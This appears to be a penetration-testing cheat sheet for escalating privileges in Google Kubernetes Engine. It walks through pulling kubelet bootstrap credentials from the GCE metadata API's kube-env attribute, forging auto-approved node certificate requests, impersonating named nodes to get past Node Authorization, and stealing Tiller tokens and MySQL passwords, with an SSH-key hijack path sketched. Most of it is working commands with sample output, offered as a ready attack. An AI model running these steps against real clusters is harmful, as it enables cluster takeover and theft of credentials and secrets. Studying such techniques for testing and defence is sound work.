GCP

Goal

GKE Metadata API Attribute kube-env
  1. Obtain kube-env script from Metadata API, extract kubelet credentials, become "kubelet"
  2. Get pod list and enumerate privileged secrets
  3. Become highest privilege SA
GCE/GKE Metadata API Compute R/W
  1. Obtain IAM Token from Metadata API
  2. Enumerate Instances Info
  3. POST to Compute API to update instance ssh-key
  4. SSH Into Node, sudo
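
  • The second path is not walked through below, but its first steps can be sketched with plain curl against the metadata and Compute APIs (a minimal sketch: it assumes jq is available for JSON parsing and that the node's service account token carries a compute scope):

    # 1. Obtain an IAM access token for the node's default service account
    $ TOKEN=$(curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' | jq -r .access_token)
    # 2. Enumerate instance info; project ID and zone also come from the metadata API
    $ PROJECT=$(curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
    $ ZONE=$(curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/zone' | awk -F/ '{print $NF}')
    $ curl -s -H "Authorization: Bearer ${TOKEN}" "https://compute.googleapis.com/compute/v1/projects/${PROJECT}/zones/${ZONE}/instances"
    # 3. would then POST an updated ssh-keys entry to the instance's setMetadata endpoint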

Automated

GKE Metadata

  • Download kubeletmein:

    $ wget https://github.com/4ARMED/kubeletmein/releases/download/v0.5.3/kubeletmein_0.5.3_linux_amd64 -O ./kubeletmein && chmod +x ./kubeletmein
    

  • Create a bootstrap-kubeconfig file which contains the kubelet key/cert from kube-env:

    $ kubeletmein gke bootstrap
    

  • Generate a new cert (at this point, we don't know our node names within the cluster, so just use anything for the node name):

    $ kubeletmein gke generate -n anything
    

  • We now have a kubeconfig file in the current directory that grants system:nodes access via the certificate in the ./pki directory. Test it:

    $ kubectl --kubeconfig kubeconfig get pods
    

Steal Secrets

  • Find the Tiller service account token secret (we will use Tiller as a target). First, locate the Tiller pod and the node it is running on:

    $ kubectl --kubeconfig kubeconfig get pods -l app=helm,name=tiller -n kube-system -o wide
    NAME                             READY   STATUS    RESTARTS   AGE   IP          NODE
    tiller-deploy-5c99b8bcbf-w7xq5   1/1     Running   0          18m   10.36.1.8   gke-cluster0-default-pool-eb80ec96-9n9f
    

  • Since Tiller is deployed to node gke-cluster0-default-pool-eb80ec96-9n9f, we need a node cert for that node.

  • First, delete the existing certs generated by kubeletmein (stored in the ./pki directory by default):

    $ rm pki/kubelet-client-*
    

  • Then, generate the new one:

    $ kubeletmein gke generate -n gke-cluster0-default-pool-eb80ec96-9n9f
    

  • Use the newly created kubeconfig to find the name of Tiller's service account token secret:

    $ kubectl --kubeconfig kubeconfig -n kube-system get pod tiller-deploy-5c99b8bcbf-w7xq5 -o jsonpath='{.spec.volumes[0].secret.secretName}{"\n"}'
    tiller-token-mr4df
    

  • Obtain the token and decode it into a file:

    $ kubectl --kubeconfig kubeconfig -n kube-system get secret tiller-token-mr4df -o jsonpath='{.data.token}' | base64 -d > tiller-token
    

  • Use the token to access the API as the tiller service account:

    $ kubectl --certificate-authority ca-certificates.crt --token "$(cat tiller-token)" --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secrets
    

Kube-Env-Stealer

  • bgeesaman/kube-env-stealer
  • If you can run a pod in GKE and the cluster is not running Metadata Concealment or the newer Workload Identity, you have a very good chance of becoming cluster-admin in under a minute (a quick check is sketched below)
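  • A quick way to check this from inside a pod is to request the kube-env attribute directly; if Metadata Concealment or Workload Identity is in place, this returns an error instead of the script (a minimal check, reusing the metadata URL from the manual section below):

    $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | head -n 3
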

Manual

GKE Metadata

  • GKE supplies an instance attribute called kube-env; three of its values are of interest:

    • KUBELET_CERT
    • KUBELET_KEY
    • CA_CERT
  • Try to access this metadata from a compromised pod:

    $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt
    $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key
    $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt
    
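  • Equivalently, to avoid hitting the metadata endpoint three times, save kube-env once and extract the values from the local copy (the same commands, just restructured; the file name kube-env.txt is arbitrary):

    $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' > kube-env.txt
    $ grep ^KUBELET_CERT kube-env.txt | awk '{print $2}' | base64 -d > kubelet.crt
    $ grep ^KUBELET_KEY kube-env.txt | awk '{print $2}' | base64 -d > kubelet.key
    $ grep ^CA_CERT kube-env.txt | awk '{print $2}' | base64 -d > apiserver.crt
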

  • Try to access the Kubernetes API as the kubelet ($KUBERNETES_PORT_443_TCP_ADDR is a standard environment variable exposed to all pods giving the IP address of the master):

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods --all-namespaces
    Error from server (Forbidden): pods is forbidden: User "kubelet" cannot list pods at the cluster scope
    

  • These are just bootstrap credentials: they only grant access to the CertificateSigningRequest (CSR) API. The kubelet uses them to submit a CSR to the control plane and obtain its real client certificate

  • Use those credentials again, but this time look at the CSRs instead of pods. You'll see some for your cluster nodes:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests
    NAME                                                   AGE    REQUESTOR   CONDITION
    node-csr-0eoGCDTP-Q-UYT7KYh-zBB1_3emr4SG43m1XDomxNUI   157m   kubelet     Approved,Issued
    node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM   28m    kubelet     Approved,Issued
    

  • The kube-controller-manager will, by default, auto-approve certificate signing requests with organization system:nodes and a common name prefixed with "system:node:", and issue a client certificate that the kubelet can then use for its normal functions. Inspect one of them:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM -o yaml
    

  • The certificate is in the status.certificate field:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM -o jsonpath='{.status.certificate}' | base64 -d > node.crt
    

  • Use the certificate and supply it via --client-certificate:

    $ kubectl --client-certificate node.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods
    error: tls: private key type does not match public key type
    

  • It doesn't work because the kubelet bootstrap creates a new private key (with the function LoadOrGenerateKeyFile) before it creates the CSR. We can retrieve the certificate, but we don't have the matching key, so we can't use it.

  • Let's create our own key, generate a CSR and submit it to the API
  • If you have a look at that certificate we downloaded, you will see the Subject we need.

    $ openssl x509 -in node.crt -text
    ...
    Subject: O=system:nodes, CN=system:node:gke-cluster19-default-pool-6c73beb1-wmh3
    

  • For now we will use arbitraryname:

    $ openssl req -nodes -newkey rsa:2048 -keyout k8shack.key -out k8shack.csr -subj "/O=system:nodes/CN=system:node:arbitraryname"
    

  • Now submit this to the API:

    $ cat <<EOF | kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} create -f -
    apiVersion: certificates.k8s.io/v1beta1
    kind: CertificateSigningRequest
    metadata:
      name: node-csr-$(date +%s)
    spec:
      groups:
      - system:nodes
      request: $(cat k8shack.csr | base64 | tr -d '\n')
      usages:
      - digital signature
      - key encipherment
      - client auth
    EOF
    

  • Did it get approved?

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-1543519800
    NAME                  AGE    REQUESTOR   CONDITION
    node-csr-1543519800   111s   kubelet     Approved,Issued
    

  • Let's go grab our certificate like we did before:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-1543519800 -o jsonpath='{.status.certificate}' | base64 -d > node2.crt
    

  • Now let's use it to access the apiserver:

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods -o wide
    

  • We now have access to the API as a member of the group system:nodes.
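  • Optionally, sanity-check what this identity is allowed to do with kubectl auth can-i (a standard kubectl subcommand, shown here as a quick sketch):

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} auth can-i get pods
    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} auth can-i list secrets
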

Steal Secrets

  • You cannot list all secrets, so find the secret name from the pod spec:

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pod gangly-rattlesnake-mysql-master-0 -o yaml
    apiVersion: v1
    kind: Pod
    [..]
    spec:
      containers:
      - env:
        - name: MYSQL_ROOT_PASSWORD
          valueFrom:
            secretKeyRef:
              key: mysql-root-password
              name: gangly-rattlesnake-mysql
        - name: MYSQL_DATABASE
    

  • Let's grab it:

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secret gangly-rattlesnake-mysql -o yaml
    Error from server (Forbidden): secrets "gangly-rattlesnake-mysql" is forbidden: User "system:node:arbitraryname" cannot get secrets in the namespace "default": no path found to object
    

  • The cluster is running Node Authorization, which means the API server will only let a node see the secrets of pods running on itself. As we tried to access this secret with the made-up node name arbitraryname, we are not authorised: the pod is not running on a node of that name

  • The solution is simple: find the node name we need and request a new certificate with that node name, as shown below. Kubernetes does not restrict which nodes can request which certificates.
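  • The node name can be read straight from the target pod's spec using the certificate we already have (a sketch; .spec.nodeName is a standard pod field):

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pod gangly-rattlesnake-mysql-master-0 -o jsonpath='{.spec.nodeName}{"\n"}'
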
  • Create a new CSR:

    $ openssl req -nodes -newkey rsa:2048 -keyout k8shack.key -out k8shack.csr -subj "/O=system:nodes/CN=system:node:gke-cluster19-default-pool-6c73beb1-8cj1"
    

  • Then submit it to the API server as before:

    $ cat <<EOF | kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} create -f -
    apiVersion: certificates.k8s.io/v1beta1
    kind: CertificateSigningRequest
    metadata:
      name: node-csr-$(date +%s)
    spec:
      groups:
      - system:nodes
      request: $(cat k8shack.csr | base64 | tr -d '\n')
      usages:
      - digital signature
      - key encipherment
      - client auth
    EOF
    

  • Then retrieve the cert:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-1543524743 -o jsonpath='{.status.certificate}' | base64 -d > node2.crt
    

  • Now let's retrieve the secret:

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secret gangly-rattlesnake-mysql -o yaml
    apiVersion: v1
    data:
      mysql-replication-password: T1lVRVI3TDE1Zg==
      mysql-root-password: OXNSWkRZUnZhRQ==
    kind: Secret
    metadata:
      creationTimestamp: 2018-11-29T20:22:57Z
      labels:
        app: mysql
        chart: mysql-4.2.0
        heritage: Tiller
        release: gangly-rattlesnake
      name: gangly-rattlesnake-mysql
      namespace: default
      resourceVersion: "24460"
      selfLink: /api/v1/namespaces/default/secrets/gangly-rattlesnake-mysql
      uid: 8f19d5fd-f414-11e8-a0f7-42010a80009b
    type: Opaque
    

  • The secret values are base64 encoded:

    $ echo -n OXNSWkRZUnZhRQ== | base64 -d
    9sRZDYRvaE